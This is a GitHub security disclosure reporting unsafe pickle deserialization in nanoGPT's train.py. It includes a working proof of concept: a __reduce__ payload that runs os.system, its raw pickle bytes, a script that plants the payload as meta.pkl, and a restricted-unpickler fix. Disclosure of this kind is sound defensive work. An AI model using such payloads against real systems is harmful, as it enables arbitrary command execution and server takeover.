[Security] Code Execution via unsafe deserialization #661

@edoardottt

Description

Summary

An Unsafe Deserialization vulnerability via pickle.load() in nanoGPT allows Remote Command Execution on the server host.

Details

The vulnerability is caused by the use of the unsafe pickle.load() function from the pickle serialization library (train.py#L142).

import pickle
# ...
# attempt to derive vocab_size from the dataset
meta_path = os.path.join(data_dir, 'meta.pkl')
meta_vocab_size = None
if os.path.exists(meta_path):
    with open(meta_path, 'rb') as f:
        meta = pickle.load(f)
    meta_vocab_size = meta['vocab_size']
    print(f"found vocab_size = {meta_vocab_size} (inside {meta_path})")

PoC

For a simple proof of concept, we use the byte representation of the pickled object below:

import os

class Evil:
    def __reduce__(self):
        # called by pickle at load time: unpickling this object runs the command
        return (os.system, ("touch pwned",))

that is: \x80\x04\x95&\x00\x00\x00\x00\x00\x00\x00\x8c\x05posix\x94\x8c\x06system\x94\x93\x94\x8c\x0btouch pwned\x94\x85\x94R\x94. (the length prefixes match the 11-character command, and the trailing period is the pickle STOP opcode)
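
These bytes can be regenerated with a short script (a minimal sketch: protocol 4 matches the \x80\x04 header above, and the payload was produced on a POSIX host, which is why os.system serializes as posix.system):

import os
import pickle

class Evil:
    def __reduce__(self):
        # pickle will call os.system("touch pwned") when this object is loaded
        return (os.system, ("touch pwned",))

# protocol 4 reproduces the \x80\x04 header shown above
payload = pickle.dumps(Evil(), protocol=4)
print(payload)

# plant the payload where train.py looks for the dataset metadata
with open('meta.pkl', 'wb') as f:
    f.write(payload)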

Using this payload as the content of the meta.pkl file, an attacker can execute arbitrary system commands.
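
Loading the planted file, exactly as train.py does, is enough to trigger execution (a minimal reproduction, assuming meta.pkl was written as above):

import pickle

# same pattern as the vulnerable snippet from train.py
with open('meta.pkl', 'rb') as f:
    meta = pickle.load(f)  # os.system("touch pwned") runs here

# a file named "pwned" now exists in the working directory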

Impact

Usually, if attackers can control the dataset, they can subvert the model's behavior, for example by injecting fake outputs into cached queries.
In this case, attackers can run arbitrary system commands without any restriction (e.g. they could spawn a reverse shell and gain access to the server).
The impact is high, as the attacker can completely take over the server host.
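
Since meta.pkl only needs to carry plain data (a dict of ints and strings), one possible hardening approach is a restricted unpickler that refuses to resolve any global, following the "Restricting Globals" pattern from the pickle documentation (a sketch, not an official nanoGPT fix; safe_load is a hypothetical helper name):

import pickle

class SafeUnpickler(pickle.Unpickler):
    # refuse to resolve any global, so callables like os.system can never be loaded
    def find_class(self, module, name):
        raise pickle.UnpicklingError(
            f"blocked unpickling of global {module}.{name}")

def safe_load(path):
    with open(path, 'rb') as f:
        return SafeUnpickler(f).load()

A plain metadata dict such as {'vocab_size': 65} still loads fine, while the PoC payload above now raises UnpicklingError instead of executing code.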


Credits

Edoardo Ottavianelli (@edoardottt)
